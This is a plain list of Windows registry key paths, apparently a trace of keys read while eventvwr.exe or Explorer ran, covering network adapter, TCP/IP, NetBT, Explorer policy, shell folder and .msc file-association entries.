HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0004\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0004\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0004\Description
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0004\Ndi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0004\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0004\Linkage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0004\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tcpip\Parameters\Adapters\{8E301A52-AFFA-4F49-B9CA-C79096A1A056}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0005
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0005\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0005\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0005\Description
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0005\Ndi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0005\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0005\Linkage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0005\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tcpip\Parameters\Adapters\NdisWanIpv6
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0006
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0006\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0006\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0006\Description
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0006\Ndi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0006\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0006\Linkage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0006\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tcpip\Parameters\Adapters\NdisWanBh
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0007
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0007\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0007\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0007\Description
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0007\Ndi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0007\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0007\Linkage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0007\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tcpip\Parameters\Adapters\{C2D43895-0262-4873-A789-C2F96D24B693}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Adapters\{C2D43895-0262-4873-A789-C2F96D24B693}\IpConfig
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0008
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0008\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0008\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0008\Description
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0008\Ndi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0008\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0008\Linkage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0008\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tcpip\Parameters\Adapters\NdisWanIp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0009
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0009\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0009\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0009\Description
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0009\Ndi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0009\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0009\Linkage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0009\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tcpip\Parameters\Adapters\{684BB8B6-2793-49A5-8012-E0A941B4B4DF}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0010
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0010\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0010\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0010\Description
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0010\Ndi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0010\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0010\Linkage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0010\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tcpip\Parameters\Adapters\{78032B7E-4968-42D3-9F37-287EA86C0AAA}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0011
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0011\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0011\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0011\Description
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0011\Ndi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0011\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0011\Linkage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0011\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tcpip\Parameters\Adapters\{CFE0B7CF-841E-4D51-AC07-A628D1182330}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Adapters\{CFE0B7CF-841E-4D51-AC07-A628D1182330}\IpConfig
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\Properties
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\Properties\Ndi
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\Properties\Linkage
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\EnableDHCP
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\EnableSecurityFilters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\TCPAllowedPorts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\UDPAllowedPorts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RawIPAllowedProtocols
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_{C2D43895-0262-4873-A789-C2F96D24B693}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\Interfaces\Tcpip_{C2D43895-0262-4873-A789-C2F96D24B693}\NetbiosOptions
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netbt\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableDNS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableLMHOSTS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\ScopeID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\NameServer
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DatabasePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UseZeroBroadcast
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\ArpAlwaysSourceRoute
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\ArpUseEtherSNAP
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultTOS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultTTL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\EnableDeadGWDetect
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\EnablePMTUBHDetect
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\EnablePMTUDiscovery
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\ForwardBufferMemory
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\IGMPLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\KeepAliveInterval
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\KeepAliveTime
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\MTU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\NumForwardPackets
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\TcpMaxConnectRetransmissions
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\TcpMaxDataRetransmissions
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\TcpNumConnections
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\TcpUseRFC1122UrgentPointer
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\TcpWindowSize
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{CFE0B7CF-841E-4D51-AC07-A628D1182330}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{CFE0B7CF-841E-4D51-AC07-A628D1182330}\EnableDHCP
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\eventvwr.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_CLASSES_ROOT\.msc
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.msc\(Default)
HKEY_CLASSES_ROOT\.msc\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.msc\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.msc
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.msc\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.msc\UserChoice
HKEY_CLASSES_ROOT\MSCFile
HKEY_CURRENT_USER\Software\Classes\mscfile\CurVer
HKEY_CURRENT_USER\Software\Classes\mscfile\
HKEY_CURRENT_USER\Software\Classes\mscfile\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mscfile\shellex\IconHandler\(Default)
HKEY_CURRENT_USER\Software\Classes\mscfile\DocObject
HKEY_CLASSES_ROOT\SystemFileAssociations\.msc
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.msc\PerceivedType
HKEY_CURRENT_USER\Software\Classes\mscfile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.msc\Content Type
HKEY_CURRENT_USER\Software\Classes\mscfile\Clsid
HKEY_CURRENT_USER\Software\Classes\mscfile\IsShortcut
HKEY_CURRENT_USER\Software\Classes\mscfile\AlwaysShowExt
HKEY_CURRENT_USER\Software\Classes\mscfile\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\KnownFolders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
